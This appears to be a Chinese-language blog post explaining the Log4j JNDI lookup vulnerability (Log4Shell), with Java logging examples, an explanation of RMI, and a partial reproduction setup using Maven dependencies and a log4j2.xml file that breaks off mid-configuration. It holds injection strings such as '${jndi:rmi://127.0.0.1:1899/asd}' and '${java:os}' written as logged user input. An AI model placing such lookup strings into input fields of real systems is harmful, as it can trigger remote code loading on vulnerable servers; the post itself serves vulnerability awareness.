先看问题:
原本我只是希望logger.info(“hello,{}”,message); 用message来替换{}输出:hello,pxq;
但是假如我的message是${java:os},就是输出设备的具体信息;像这种可能存在隐患;
进一步如果String strings = “${jndi:rmi://127.0.0.1:1899/asd}”; 就会去执行注册中心127.0.0.1:1899中的名为asd的服务,只要用户使用了logger.info()且版本在log4j-api的版本在2.14.0以下,黑客就可以在文本框中填写以上string去在后台执行自己定义的注册中心的服务;
RMI(Remote Method Invocation)远程方法调用:是一种计算机之间对象互相调用对方函数,启动对方进程的一种机制,使用这种机制,某一台计算机上的对象在调用另外一台计算机上的方法时,使用的程序语法规则和在本地机上对象间的方法调用的语法规则一样。
String message ="pxq";
logger.info("hello,{}",message);
//输出hello,pxq 因为这边{}代表message
message = "${java:os}";
logger.info("hello,{}",message);
//hello,Windows 10 10.0, architecture: amd64-64;这边会输出本机的信息;这边是lookup的一个功能
message = "${java:vm}";
logger.info("hello,{}",message);
//hello,Java HotSpot(TM) 64-Bit Server VM (build 25.201-b09, mixed mode);这边会输出虚拟机的信息;这边是lookup的一个功能
String strings = "${jndi:rmi://127.0.0.1:1899/asd}";
logger.info("hello,{}",strings);
复现(测试代码结果有问题,但证实了执行输出前会去查找黑客注册的服务运行,我这边显示没找到服务估计是相关配置的问题):
1、log4j-api的依赖版本在2.14.0以下
<dependencies>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.0</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.0</version>
</dependency>
</dependencies>
2、配置文件log4j2.xml;
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="warn">
<Appenders>
<Console name="Console" target="SYSTEM_OUT">
<PatternLayout pattern="[%-5p] %d %c - %m%n" />
</Console>
<File name="File" fileName="dist/my.log">
<PatternLayout pattern="%m%n" />
</File>
</Appenders>
<Loggers>
<Logger name="mh.sample2.Log4jTest2" level="INFO">
<AppenderRef ref="File" /